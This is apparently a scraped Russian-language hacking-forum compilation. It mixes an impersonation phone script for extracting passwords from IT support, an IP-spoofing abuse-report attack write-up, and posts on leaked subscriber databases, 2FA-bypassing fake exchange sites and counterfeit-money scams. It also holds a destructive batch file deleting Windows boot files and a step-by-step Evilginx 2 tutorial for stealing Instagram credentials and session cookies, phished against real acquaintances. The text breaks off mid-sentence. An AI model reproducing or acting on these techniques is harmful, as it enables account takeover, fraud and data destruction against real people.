Если наша цель — системный администратор, то целевые группы будут следующие: ресепшен, секретари, hr, бухгалтерия, сотрудники технической поддержки и, собственно, админы.
Условно, по степени подверженности атакам, мы делим пользователей на следующие группы.
Параноики. От этих ничего не добьешься. Неважно, почему они такие, мама в детстве запретила разговаривать с незнакомыми людьми или недавно получили взбучку от злого безопасника. Узнаются по суконному языку, неприветливости и формализму.
Равнодушные. Такому сотруднику глубоко плевать, кто ему звонит и зачем. Еще не взяв телефонную трубку, он уже придумывает, как бы ему побыстрее от тебя отделаться, неважно, кто ты и что тебе нужно. В небольшом проценте случаев, именно в силу своего пофигизма, такой сотрудник выдаст тебе всю нужную инфу. Чаще сошлется на обед, окончание рабочего дня, занятость или отсутствие полномочий.
Трусливые. Сотрудники, до смерти боящиеся не угодить начальству, нарушить какие-либо правила или распоряжения, в общем, те, у кого страх за свое кресло в данную конкретную секунду превалирует над критическим мышлением. Побольше начальственного металла в голосе, и ты его взломаешь.
Добрые, хорошие люди, искренне готовые помочь. Но при этом не старающиеся разобраться, кому же они собственно помогают. А вот это наша целевая аудитория.
Как отличить одних от других? Подготовка, знание психологии, чутье, актерское мастерство, опыт.
Итак, на основании анализа профилей сотрудников соцсетей мы выбираем 2-х жертв: секретаря с респешен и админа. Желательно, конечно, не 2, а 5-6. Лучший выбор — яркие личности с выраженными особенностями, которых легко представить себе и изобразить. Сценарий атаки также необходимо писать с учетом особенностей психологии и связей найденных «жертв». Звонить рандомному сотруднику с просьбой сказать пароль — это провальная затея.
Жертва, от лица которой будет произведен звонок: секретарь респешен Екатерина Петрова, 21 год, в компании полгода, учится на заочном на экономиста. Яркий макияж, розовые волосы, множество фото в соцсетях, аккаунт в Тиндере.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fz0%2Fix%2Fpw%2Fz0ixpweord_mibde_-
iglcdsjye.jpeg&hash=24f1f0caf37d8a9182075671ac1f2252)
Звоним сотруднику отдела технической поддержки Дмитрию, 35 лет, стаж работы в
компании 5 лет, холост, хочет сменить место работы. Это важно, поскольку
возможно, что психологически сотрудник уже меньше ассоциирует себя с компанией
и более халатно относится к безопасности.
Разрабатываем сценарий атаки
Легенда: девочка на больничном не может зайти через owa в рабочую почту. Ей необходимо сделать рассылку для топ-менеджеров относительно сроков проведения закрытой конференции. Она 3 раза неправильно ввела пароль и просит выслать ей временный, обещая сменить пароль при первом входе. Легенду необходимо придумать заранее и выучить наизусть во избежание ситуации «еще никогда Штирлиц не был так близок к провалу». Импровизировать все равно придется и степень хаоса лучше снизить.
Главное — уверенность, не давайте человеку на другом конце провода прийти в себя. Сбился, растерялся, начал мямлить, забыл, как тебя зовут, не нашелся быстро, что ответить — проиграл.
Скрипт звонка:
— Дим, привет! Это Катя. Есть минутка?
— Привет! Какая Катя?
— Да я это! Катя Петрова, с ресепшен. Дим, спасай.
Далее возможно несколько вариантов развития событий:
В этом случае он, скорее всего, скажет что-то вроде «Чегооо? Какая Катя??» и останется только положить трубку и никогда больше не звонить Диме с этого номера. Поэтому потенциальных объектов атаки надо заранее выбрать несколько.
Допустим, у нас все хорошо и Дима готов к диалогу.
— Что случилось?
— Дим, я дома, на больничном. Не могу зайти в наш общий ящик
reсeption@xxx.ru, а мне прямо позарез надо сегодня
сделать рассылку для наших топов. Караул, меня Иванова убьет. (Иванова, как мы
выяснили в ходе сбора информации, является непосредственным Катиным
руководителем).
Во время звонка необходимо молниеносно сканировать эмоциональное состояние Димы. Он настроен на общение? Он сдержан? Он торопится? Он флиртует с Катей? Он равнодушен? Если у Димы есть какие-то хобби, про которые вы прочитали в соцсетях, тоже можно ввернуть, но очень аккуратно, чтобы не переиграть. Тут вам понадобится вся ваша эмпатия. «Просчитаете» человека, выберете нужный тон — пароль у вас в кармане.
Можно держать перед глазами фото Кати. На какое-то время вам надо самому до мозга костей стать «Катей».
Далее рассмотрим 2 варианта.
Вариантов разговора может быть много. Забыла капслок, перепутала раскладку, выбрала не тот браузер. Общая идея такова, что «Катя» будет изводить Диму своей тупостью, щебетанием и дебильными вопросами, пока он не плюнет и не продиктует или вышлет новый пароль.
После смены пароля у вас будет некоторое количество времени, ровно до того момента, пока кто-то не попробует зайти под обычным паролем и не позвонит в техническую поддержку. Что можно взять в общем ящике секретариата? Ну, например, скачать справочник с контактами сотрудников.
В защиту Димы могу сказать, что ситуации в работе технической поддержки бывают еще и не такие, и пользователи порой демонстрируют еще большую необучаемость и забывчивость.
— Дмитрий, мне необходим удаленный доступ к электронной почте. В связи с производственной необходимостью. Мне срочно надо. Что значит, нет запроса, я дома, на больничном. Да, я прошу Вас в виде исключения самостоятельно завести запрос! Меня зовут Петрова Екатерина Ивановна, отдел секретариат. Мне необходимо срочно сделать рассылку для высшего менеджмента. Мне написать руководству, что данную рассылку я не смогла сделать по вине сотрудника техподдержки?
А теперь идеальный ответ Димы: «Уважаемая Екатерина, я прошу вас перезвонить с
телефона, указанного в корпоративной информационной системе. Я не имею права
сообщить вам пароль».
Цель проверки осведомленности — не покарать несчастного Диму, слившему пароль
девочке с розовыми волосами. Главное — выявить и устранить слабые места.
Что делать компании, в которой проверка методами социальной инженерии выявила множество уязвимостей, связанный с человеческим фактором? Наши рекомендации:
Самое слабое место системы — это человек. Если не уделять внимание человеческому фактору, то какой бы безопасной и соответствующей всем стандартам и best practices ни была ваша система, вы потеряете данные через рядового пользователя.
Взято с сайта компании "Перспективный мониторинг"
Hi, guyz. I'm having some trouble with payload delivery. I would like to hear some ideas on how to deliver payloads because I'm missing creativity lately..
Книга про СИ от самого Кевина Митника)
Советую на досуге прочитать, не мало интересных вещей можно подчерпнуть.
[ https://repo.zenk-security.com/Magazine%20E-book/Kevin_Mitnick_- The_Art_of_Deception.pdf ](https://repo.zenk- security.com/Magazine%20E-book/Kevin_Mitnick-_The_Art_of_Deception.pdf)
TL;DR Атакующий подменяет source ip на адрес вашего сервера и триггерит автоматические абузы. В результате клиента на хостинге за вредоносную активность, которой не было.
Расскажу про удивительно коварный способ DDoS-атак, с которым я раньше не сталкивался. Коварство заключается в том, что на сам сервер жертвы не выполняется никакой атаки. Вместо этого, злоумышленник провоцирует срабатывание сторонних систем обнаружения атак, заставляя генерировать совершенно настоящие жалобы (в простонародье «абузы») на ваш сервер.
Со стороны хостера это выглядит так, будто вы занимаетесь вредоносной активностью, хотя на самом деле это неправда. Оказалось, что многие крупные хостинг-провайдеры не готовы глубоко разбираться в причинах проблемы и предпочтут вас просто забанить за нарушение правил.
В статье подробно разбирается этот вид атаки в реальном кейсе.
Хронология событий
Я держал несколько личных проектов на VPS-серверах у одного известного хостера. Однажды мне пришло от него такое письмо:
#9042382: ToS Violation — Malicious Activity
Hello,
We have received a report of malicious activity originating from your server XXXX. We ask that you investigate this matter as soon as you are able. Once you have completed your investigation, kindly reply to this ticket with the answers to the following questions:
Code:Copy to clipboard
Reported-From: abuse-out@checkdomain.de
Category: info
Report-Type: info
Service: different services
Version: 0.1
User-Agent: Checkdomain Express 0.19
Date: Fri, 26 May 2018 19:25:19 +0200
Source-Type: ipv4
Source: my-server-ip-xx-xxx
Port: dif.
Report-ID: dih3cefnp@checkdomain.de
Schema-URL: http://www.blocklist.de/downloads/schema/info_0.1.1.json
Attachment: text/plain
DETAILS ZU DEN ATTACKEN/STÖRUNGEN | DETAILS OF THE ATTACKS
(letzten 60 Tage / max. 100 St.) | (last 60 days / max. 100 hits)
portflood: syn | | standby.checkdomain.de |
VORHERIGE SPERREN DER IP-NUMMER | BANNED HISTORY OF THIS IP-NUMBER
my-server-ip-xxx-xxx-xxx: this ip-number was never banned before
AUZUG AUS SERVERLOGDATEI | EXCERPT FROM SERVER LOGFILE
tcp 0 0 85.10.207.190:80 my-server-ip-xx-xxx:41667 SYNRECV -
tcp 0 0 85.10.207.190:80 my-server-ip-xx-xxx:46208 SYNRECV -
tcp 0 0 85.10.207.190:80 my-server-ip-xx-xxx:13000 SYNRECV -
tcp 0 0 85.10.207.190:80 my-server-ip-xx-xxx:39104 SYNRECV -
tcp 0 0 85.10.207.190:80 my-server-ip-xx-xxx:55348 SYNRECV -
tcp 0 0 85.10.207.190:80 my-server-ip-xx-xxx:37266 SYNRECV -
tcp 0 0 85.10.207.190:80 my-server-ip-xx-xxx:60684 SYNRECV -
tcp 0 0 85.10.207.190:80 my-server-ip-xx-xxx:63878 SYNRECV -
tcp 0 0 85.10.207.190:80 my-server-ip-xx-xxx:50445 SYNRECV -
tcp 0 0 85.10.207.190:80 my-server-ip-xx-xxx:56215 SYNRECV -
Где my-server-ip-xx-xxx это IP-адрес сервера.
В нем хостер пересылает мне жалобу, поступившую на его ящик abuse@, и настойчиво просит прекратить вредоносную активность, иначе я буду заблокирован. В приложенном логе виден список TCP-подключений к 80 (HTTP) порту в состоянии SYN RECEIVED. То есть с моего сервера идёт SYN-флуд на чей- то веб-сервер.
Первая мысль — меня взломали и с моего сервера идёт SYN-флуд. В Linux есть ограничения на управление сокетами с правами обычного пользователя и посылать только SYN-пакеты (без установки полноценного TCP-соединения) можно только имея привилегии root. А это значит, что взломали полностью.
В панике бегу на сервер искать вредоносный процесс. Проверяю top, ss, lsof и ничего подозрительного не вижу. Первичный вывод: "ужас, наверное залили настолько крутой руткит, который прячет вирус на уровне ядра от всех системных утилит! ". В процессе исследований выясняется, что нагрузка на сервер никак не изменилась, по графикам в панели хостера трафик на интерфейсе остается прежним.
До этого я запускал tcpdump c фильтрами, показывающими исходящий трафик и ничего подозрительного не видел. Отчаявшись, решаю посмотреть весь трафик на сервер. В потоке легитимного трафика нахожу редкие RST-пакеты от странных серверов.
Выглядит это примерно так, где my-server-ip-xx-xxx адрес моего сервера:
Code:Copy to clipboard
IP 85.10.207.190.http > my-server-ip-xx-xxx.8389: Flags [R]
IP 85.10.207.190.http > my-server-ip-xx-xxx.8389: Flags [R]
IP 85.10.207.190.http > my-server-ip-xx-xxx.8389: Flags [R]
IP adsl-070-154.sip.pns.bellsouth.net.http > my-server-ip-xx-xxx.8389: Flags [R]
IP adsl-070-154.sip.pns.bellsouth.net.http > my-server-ip-xx-xxx.8389: Flags [R]
IP adsl-070-154.sip.pns.bellsouth.net.http > my-server-ip-xx-xxx.8389: Flags [R]
Было очевидно, что это аномалия, так как больше никакого обмена с этими
серверами не было и почему они шлют пакет закрытия соединения, мне было
неясно.
На этом моменте опытные админы сразу бы всё поняли, но мы разберём всё на
пальцах
Как это работает
Входящие RST-пакеты это ответы на попытки установить TCP-соединение на
закрытый порт. При этом от моего сервера никакого исходящего трафика в сторону
серверов, посылающих RST, нет. Это значит, что атакующий подменяет исходящий
адрес на мой и генерирует трафик, похожий на DDoS-атаку. Но так как
единственное, что может атакующий, это послать исходящий пакет, все ответы от
серверов приходят на мой сервер.
До сервера жертвы доходят только ответы на поддельные запросы
Обычно такие атаки используются для [DNS- амплификации](https://www.cloudflare.com/learning/ddos/dns-amplification- ddos-attack/), когда атакующий посылает маленький запрос от имени жертвы, а жертве приходит большой ответ, которого он не запрашивал. Это классический механизм атак на исчерпание канала.
Click to expand...
В моем случае атакующий не ставил целью исчерпать канал сервера-жертвы. Его активность была совершенно незаметна на графиках потребления канала. Главной его целью было спровоцировать системы автоматического уведомления о сетевых атаках, которые пошлют письмо с жалобой на abuse-адрес, указанный в whois подсети моего провайдера. Это умеют делать системы обнаружения и предотвращения вторжений (Intrusive Prevent/Detect System), такие как Snort и [Suricata](https://suricata- ids.org/).
В результате хостер получает абсолютно настоящее письмо от легитимных компаний, в котором содержится жалоба на мою вредоносную активность и даже логи в них настоящие. При этом атакующему не нужен большой канал, так как он заранее знает адреса серверов, на которых установлены IDS/IPS-системы и минимально необходимое число пакетов, чтобы сработала автоматическая жалоба.
Единственной трудностью для атакующего является поиск сервера, разрешающего подмену исходящих IP-адресов в пакетах. Все нормальные хостеры блокируют такие пакеты. Существует только два типа хостинга, позволяющего клиентам подменять исходящий IP: либо очень безграмотно настроенный, либо специально созданный для кибер-криминала.
Проверяем возможность подмены IP-адреса
Советую вам проверить своего хостера на возможность подмены исходящего IP. Для этого потребуется два сервера, один для приёма трафика, другой для отправки.
На стороне принимающего сервера запустим логирование входящего трафика. В качестве фильтра укажем редкий порт, на котором в обычное время не должно быть трафика:
Code:Copy to clipboard
tcpdump -i any port 9912
На проверяемом сервере сгенерируем пакет с подменой исходящего IP-адреса на 1.1.1.1 , направленный на порт 9912. Для этого используем крутую утилиту nping от разработчиков nmap. Она позволяет генерировать любые нестандартные пакеты на уровне L2 и L3.
Code:Copy to clipboard
nping --tcp -p 9912 -S 1.1.1.1 receiver-server.com
receiver-server.com — адрес слушающего сервера, на котором запущен tcpdump
1.1.1.1 — подменяемый исходящий адрес
9912 — удалённый порт
Если на стороне receiver-server.com вы увидите пакет, пришедший от имени 1.1.1.1, значит ваш провайдер позволяет подменять исходящий IP-адрес. Это повод сообщить ему о проблемах в настройке сетевого оборудования. Зачастую такой проблемой страдают домашние интернет-провайдеры.
Глупая техподдержка
Разобравшись в причинах жалоб, я подробно все изложил хостеру:
Hello,
I finally understand what happened.They spoof my IP address and DDoS random hosts using my address as source address. So victims generate automatic abuse reports to my hosting providers.
You can see on abuse log that connections are only in SYN_RECV state (no full TCP-connection established) because they can send only one packet using spoofed IP and can't finish TCP-handshake.
I can prove this. There are many TCP RST incoming packets coming right now to my server from hosts whom I never sent any packets.You can check it right now by running:
tcpdump -i eth0 «tcp[tcpflags] & (tcp-rst) != 0»
You will see that many RST packets came from hosts to which I've never sent any data.
This proves that attacker is spoofing my IP-address to compromise me and generate abuses.Click to expand...
Тогда мне казалось, что любой квалифицированный инженер техподдержки разберётся в ситуации и вопрос будет закрыт. Но вместо этого они требовали от меня проверить сервер антивирусом или полностью переустановить ОС. Пока мы переписывались с техподдержкой, абузы продолжали поступать и через сутки меня забанили.
Было дико обидно, что меня фактически подставили. Эта ситуация показывает, насколько уязвимы люди, которые вместо того, чтобы разбираться, бездумно следуют скриптам.
Автор: Ahcai5oh
взято с хабра
Знакомый работает в kcell рассказал что недавно около недели назад у них увели
всю бд со всей инфо абонентов, (что использовали в мошеннических целях: звоня
от имени Алфа банка и говоря что у вас не погашен кредит)
Судя по всему она уже есть где-то в открытом доступе . Если кто найдет кидайте
сюда. (СМИ пока ещё не писали об этом)
Всем привет, есть дилема нужно залить новый офер по типу опросников.
Можете пожалуйста сказать на какую партнёрку лучше заливать?
и еще какую платёжку лучше подключать для таких дел?
(фрикасса отказали, кликпей24 тоже отказали)
Кидайте линк под хайд, как будет время солью его вам .
Так же могу изменить инфу на нем
Есть тематический источник трафа на фейк, обрабатываю жертв точечно.
Ищу людей с грамотными фейками (обход 2fa итд) топ биткоин бирж.
От вас нужна полная прозрачность в приходящих логах.
Предпочтение отдам людям с репутацией.
Первый контакт в пм.
Друзья, часто вижу спам юзеров, где по ссылке ты переходишь на фишинг авито, но тут самое интересное, что попадаешь якобы на свое объявление, и якобы тебе на авито счет залили денег и что бы их получить надо установить апк для получение денег) /Интнерен мне очень скрипт
Хочу купить чекер и базу , не совсем знаю ,что делать после обработки ?
Всем привет, кто может дать список интернет магазинов с оплатой masterpass?
Нужны для теста, без разницы с какой странны , но желательно зарубежные.
Недавно , листая Instagram , наткнулся на рекламу продажи фальшивых банкнот . Свайпая вверх , вас перенаправляет в телеграмм ,где вам показывают , ценны , видео-подтверждения и проверки , для покупки надо написать менеджеру ,который проконсультирует вас и предложит способ оплаты . Ценник там очень низкий при общениях , что вы сольёте их везде где это возможно . 1500₽-5000₽,2500₽-7000₽ И т.д. Оплата была QIWI или BTC .
Перейдём к сути темы :
1.Набираем матерьял для телеграмма , картинки , видео ,текст и т.п.
2. Для пиара создаём Facebook аккаунт , желательно полностью анонимно , т.к.
схема черная .
3.Создаем группу в Телеграмме и оформляем ее матерьялом , который мы напасли .
4. Также достаём 300 рублей полностью анонимные и покупаем на них рекламу в
Instagram . Оформляем запись для рекламы как можно увлекательней и заманчивей
.
5. Пиаримся как можно сильнее !!!
6. Ждём первых покупателей , главное придумайте как вы будете «доставлять»
деньги
Надеюсь было интересно почитать , если хотите сделать ,что-то подобное то пишите о ваших достижениях
Работает еще кто? Будет пользоваться спросом услуга по рефанду?
Пока только .com.
У меня вопрос.Почему я создаю батники пишу off и то что мне нужно но есть проблема я когда его сохраняю в .bat , я его запускою и опа ничего не происходит, в чём причина, ошибок я не делаю всё проверяю вот пример:
off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
В этой статье мы изучим, как работает реверс-прокси Evilginx 2, и на примере Instagram посмотрим, как с его помощью уводят аккаунты в обход двухфакторной аутентификации. Поднимем боевой стенд, настроим все необходимые параметры и закинем удочку с наживкой посочнее.
Подноготная обманных маневров
Для защиты аккаунтов крупные онлайн-сервисы используют двухфакторную аутентификацию (2FA). Обычно ее реализация сводится к тому, что помимо логина и пароля нужно ввести одноразовый код, присылаемый в SMS или push-уведомлении на номер мобильного, указанный при регистрации. До недавних пор 2FA считалась сравнительно надежной противоугонной системой, однако сейчас уже есть готовые инструменты, позволяющие легко преодолевать ее.
Один из них — Evilginx 2, о котором мы и поговорим. Это обратный прокси-сервер и готовый фреймворк для выполнения MITM-атаки с целью обхода двухфакторной аутентификации. В нем автоматизировано все, что только можно. Как же он работает?
В общем случае для удачной атаки фишеру необходимо вклиниться между жертвой и запрашиваемым ей сайтом, перехватить учетные данные, а заодно распознать и сохранить cookies сессии. Сделать это при обычной авторизации по HTTP было сравнительно просто, но с переходом сайтов на HTTPS и 2FA потребовало концептуально других методов.
У Evilginx 2 есть суперспособность создавать подписанный сертификат для фейкового сайта при помощи клиента бесплатного и полностью автоматизированного удостоверяющего центра Let’s Encrypt. Это помогает атакующей стороне использовать HTTPS и украсить фишинговый сайт зеленым замочком в адресной строке. В итоге подделка получается визуально неотличимой от оригинала (по крайней мере, на первый взгляд). Плюс к этому Evilginx 2 самостоятельно определяет и перехватывает валидные «печеньки», а это — главная составляющая успешного взлома.
Дальше уже вопрос смекалки фишера. Например, получив доступ к одному аккаунту, ты создаешь от его имени группу или рассылку с просьбой проголосовать в каком- нибудь конкурсе. Друзья переходят по твоей ссылке, а ты собираешь учетки голосующих — и площадь атаки растет в геометрической прогрессии.
Как создавался злой прокси
Автор описываемого инструмента — польский этичный хакер Куба Грецки kgretzky. Первое упоминание об Evilginx (на тот момент еще первой версии) в его блоге датировано 6 апреля 2017 года.
Первоначально за основу он взял два модуля популярного веб-сервера Nginx: sub_filter и proxy_pass. В Evilginx первый модуль блокирует доступ жертвы к реальному ресурсу, а второй передает перехваченные запросы на требуемый сервер и обратно. Уже на тот момент программа представлялась как инструмент, который способен пробить защиту 2FA.
Разработчика пригласили для выступления на конференцию WarCon 2018, где его заметил Кевин Митник. Он написал про Evilginx, что послужило отличной рекламой. Evilginx начал быстро набирать популярность. К июню того же года было выпущено два релиза Evilginx — 1.0 и 1.1.
На все том же WarCon 2018 Куба Грецки познакомился с ведущим специалистом по информационной безопасности итальянской фирмы Zimperium — «белым хакером» Симоне Маргарителли, публикующим свои исследования под псевдонимом evilsocket. Маргарителли показал ему все прелести языка Go и вдохновил переписать Evilginx. Год спустя вышел полностью переработанный Evilginx 2. Проект эволюционировал от идеи MITM through Nginx до «Evilginx 2 w/o Nginx. Pure Go, and pure evil». Это был первый переломный момент.
Второй наступил, когда свет увидел опенсорсный проект Modlishka. На тот момент сложность использования Evilginx 2 заключалась в проксировании трафика. Необходимо было писать множество фильтров, которые динамически заменяли ссылки на фишинговые. Делалось это методом проб и ошибок, что сильно усложняло код.
Затем Куба Грецки увидел, как реализована подмена URL в Modlishka. Оказалось, что не обязательно писать тонны своих фильтров — достаточно один раз добавить домен сайта и прописать общие правила подмены трафика. Это было рождение компонентов phishlets — готовых скриптов для имитации структуры популярных сайтов. На данный момент мы можем воспользоваться Evilginx версии уже 2.3.1.
Evilginx 2 vs Modlishka
В моей предыдущей статье был разобран другой инструмент для обхода двухфакторной аутентификации — Modlishka. На тот момент в нем не было автоматизированного решения проблемы с HTTPS и сертификатом, так что закручивать эту гайку приходилось самому. Да и запустить на нем можно было лишь один фишинговый сайт, что снижает практический эффект атаки.
Evilginx 2 лишен этих недостатков. На таком «комбайне для фишинга» можно запустить перехват учетных данных с нескольких сервисов одновременно (подробнее об этом ниже). К тому же готовое решение с сертификатом сильно развязывает руки. На мой взгляд, Evilginx 2 опережает Modlishka на несколько шагов из-за грамотного подхода и максимального удобства использования.
На данный момент проект претерпел несколько релизов и продолжает развиваться. Например, в последних обновлениях были добавлены JS-инъекции. Они позволяют внедрять в трафик свои скрипты на JS, которые выполнятся на машине жертвы.
Я привык, что все хакерские утилиты пишут для Linux, однако Evilginx 2 доступен и в Windows, и в виде контейнера Docker. К моему удивлению, в «окнах» он работает ничуть не хуже, а его установка оказалась даже проще, чем на Linux. Просто скачиваем архив, распаковываем его в любой каталог и запускаем экзешник. Да, это портейбл-утилита, которую можно записать хоть на флешку и запускать в Windows, начиная с версии 7. Она не требует установки и не оставляет следов в реестре.
![Evilginx 2 в Windows](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F244615%2F12-2.png&hash=01a6c21dfa8733595d308c79143727f9)
Evilginx 2 в Windows
Редактировать файл .yml можно из «Блокнота».
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F10%2F244615%2F13-2.png&hash=16e22140052d1dda7f5391cfc92139c6)
Вижу, как у тебя зачесались руки, давай перейдем от слов к делу. Только заниматься этим будем все же в Linux.
Готовим боевой стенд
Задача следующая: поднять в интернете сервер с Evilginx 2 и перехватить несколько экземпляров учетных данных от популярной социальной сети.
Начнем с того, что нам нужна VDS с минимальными системными требованиями. У меня были одно ядро с гигабайтом оперативной памяти и 30 Гб жесткого диска плюс белый IP-адрес. На борту — Ubuntu 16.04. Конечно же, нужно зарегать домен, привязанный к этому IP. Вот только сделать это бесплатно в излюбленном месте халявщиков — freedom — не получится. Необходимо иметь не одно доменное имя, а доменную зону, которую тебе делегируют. Ее можно купить у провайдера, например REG.RU. При покупке домена в комплекте идет управление DNS, где ты и можешь записью DNS А прикрепить доменное имя к IP-адресу или наделать поддоменов, которые могут пригодиться для развития атаки.
Идем на новоиспеченный сервер и первым делом ставим среду разработки для языка Go, так как второй Evilginx написан на нем.
Apache config:Copy to clipboard
sudo add-apt-repository ppa:longsleep/golang-backports
sudo apt-get update
sudo apt-get install golang-go
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
Проверяем, все ли взлетело:
Code:Copy to clipboard
go env
Должен быть явно указан путь GOPATH.
![Вывод терминала env GO](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F244615%2F1.png&hash=e0f21ceb58f78d83ceda53e0e0dbd916)
Вывод терминала env GO
Теперь ставим сам Evilginx 2
Apache config:Copy to clipboard
apt-get install git make
go get -u github.com/kgretzky/evilginx2
cd $GOPATH/src/github.com/kgretzky/evilginx2
make
make install
Перед запуском надо проверить, не заняты ли у нас порты 80 и 443. Они нужны для проксирования трафика. Я подумал, что в чистой ОС они должны быть свободны, и ошибся. 80 порт занял предустановленный Apache, из-за чего не смог автоматом сгенерироваться сертификат.
Code:Copy to clipboard
netstat –antp
![Проверяем прослушиваемые порты
ОС](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F244615%2F2.png&hash=7e09914056b9c8f5b8d5e4b104b6134a)
Проверяем прослушиваемые порты ОС
После того, как необходимые порты освобождены, можно запустить сам сервер, просто написав его имя в консоли — evilginx.
![Интерфейс Evilginx](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F244615%2F3.png&hash=968557057aeb4a196679b3ce468e9443)
Интерфейс Evilginx
Если после запуска сразу перейти на фишинговый сайт по его доменному имени, то программа просто перенаправит посетителя на видеохостинг Youtube. Это действие задано по умолчанию, а нужное тебе ты можешь выставить в настройках. Чтобы увидеть настройки, набираем config.
![Дефолтная конфигурация](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F244615%2F4.png&hash=e041467c933cef018ef480ce17f405ca)
Дефолтная конфигурация
В конфиге поле domain должно соответствовать нашему фишинговому домену, IP — его IP-адресу. Параметр redirect_url — это домен, на который будет переброшена жертва, которая перейдет по чистой ссылке. Задать настройки можно следующими командами:
Code:Copy to clipboard
config domain yourDomain.com
config ip yourIP
Теперь немного об устройстве всей этой станции. Опираться придется на две сущности.
Phishlets — это конфигурационные файлы, задающие правила основной работы Evilginx. В них указывается, по каким параметрам определять авторизацию, как выглядят cookie-сессии и все остальные данные для удачного фишинга. Находятся они в одноименном каталоге рядом с программой и имеют расширение .yaml . Всего их уже написано 13 штук для разных популярных сайтов, а скоро наверняка появятся еще. Главное, что можно написать свои. Есть две версии формата написания: для релиза 2.2.0 и для версии 2.3.0, принимаются пока обе. Они слегка отличаются синтаксисом и возможностями. Для каждой из них имеется очень подробное описание.
![Вид конфигурационного файла
phishlets](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F244615%2F5.png&hash=962e2ef496b44706729a295954e20928)
Вид конфигурационного файла phishlets
Помимо фишлетов, в Evilginx есть набор ловушек (lures). Это программные функции, которые генерируют ссылки, разруливая подмену трафика и его движение внутри самой хост-машины в зависимости от того, куда мы хотим направить жертву.
Перед тем как перейти к работе, стоит уточнить еще один момент: в домашнем каталоге должна появиться скрытая директория с названием инструмента. В ней находится основной конфиг (параметры, которые мы указывали), база данных (там будут пойманные креды и сессии) плюс сертификат с ключом. Если залезть в потроха сертификата, то станет видно, что он корневой, выдан сроком на 10 лет и подписан как Evilginx Super-Evil Root CA. Чтобы вывести информацию о нем, необходимо воспользоваться командой
Code:Copy to clipboard
openssl x509 -in ca.crt -text
![Информация сертификата](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F244615%2F6.png&hash=c787405bb7a2819b9c569f704a88f8c7)
Информация сертификата
Cовет: если ты будешь использовать VDS и захочешь после отключения от SSH- сессии вернуться к запущенному Evilginx, используй оконный менеджер с поддержкой терминальных сеансов [Screen](https://larga.ru/article/linux- screen).
Переходим к основной работе. Первым делом нам необходимо настроить фишлеты. Я буду использовать фишлет для Instagram. Чтобы увидеть все конфиги, просто вводим команду phishlets. Пока они пустые. Добавляем наш домен к выбранному конфигу:
Code:Copy to clipboard
phishlets hostname instagram yourDomain
Теперь создаем ловушку для пользователей «Инсты»:
Code:Copy to clipboard
lures create instagram
В итоге все должно выглядеть как на скриншоте ниже.
![Программа, подготовленная к
запуску](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F244615%2F7.png&hash=63c1c99bd42da6e9925a5f38ca388b48)
Программа, подготовленная к запуску
Запускаем один или несколько фишлетов:
Code:Copy to clipboard
phishlets enable Instagram
![Запуск программы](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F244615%2F8.png&hash=dde5e096249b36ae4a5158c82a0bc695)
Запуск программы
Что происходит? Во-первых, генерируется сертификат (это как раз тот момент, когда все может рассыпаться как карточный дом, если будут заняты 80 или 443 порты). Генерируется он при помощи встроенной программы Let's Encrypt, так что получается, что на фишинговый домен тебе выдан валидный (спаси нас всех великий Админ) сертификат! Это решает проблему с HTTPS-соединением и правдоподобностью всего происходящего.
Во-вторых, происходит запуск самого прокси-сервера, изначально построенного на популярном веб-сервере Nginx. Сейчас он переписан на Go, однако символическое название осталось. Начинается прослушка трафика и фильтрация содержимого по заданным конфигурациям фишлетов.
Чтобы увидеть все ловушки, надо набрать: lures. Обрати внимание на таблицу и столбец id. Для получения готовой фишинговой ссылки вводим lures get-url id, где id — это цифра из таблицы.
Тестируем сервер
Перед тем как заманивать жертву по ссылке, надо протестировать наш сервер и уточнить некоторые детали. Заходим сами по фишинговой ссылке и видим перед собой страницу с предложением авторизоваться в Instagram. Все выглядит убедительно. Вводим логин, пароль и код из SMS. Отлично, роль жертвы исполнена!
В это же время на сервере происходит вот что: в терминале будет хорошо видно, что кто-то посещал твою страницу. При перехвате аутентификационных данных они сразу отобразятся. Как только креды перехвачены, они записываются в базу данных. Увидеть их можно, введя команду sessions.
![Перехваченный логин и пароль](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F244615%2F9.png&hash=46ed509f6dc94296a49c7e1764c84bdb)
Перехваченный логин и пароль
Но как же быть с 2FA? В тот момент, когда жертва вводит пароль из SMS- сообщения, Evilginx 2 перехватывает еще и сессию авторизации, или cookie. Если в терминале Evilginx появилась строка: «all authorization tokens intercepted!», это как раз говорит об успешном захвате сессии. Увидеть статус перехвата можно, набрав команду session id.
![Сессия жертвы](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F244615%2F10.png&hash=ed2dabeecd423839fe0e817ad64d3a50)
Сессия жертвы
Чтобы импортировать сессию в браузер, можно воспользоваться плагином EditThisCookie. Все, теперь мы авторизованы в Instagram от имени жертвы, а логин и пароль нам вообще не нужны!
Первые жертвы
Остается последний этап — проверка боем. Я разослал двадцати знакомым из
своего списка контактов сообщение с фишинговой ссылкой и фразой «Прикольно
придумали!».
![Пример фишинговой рассылки](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
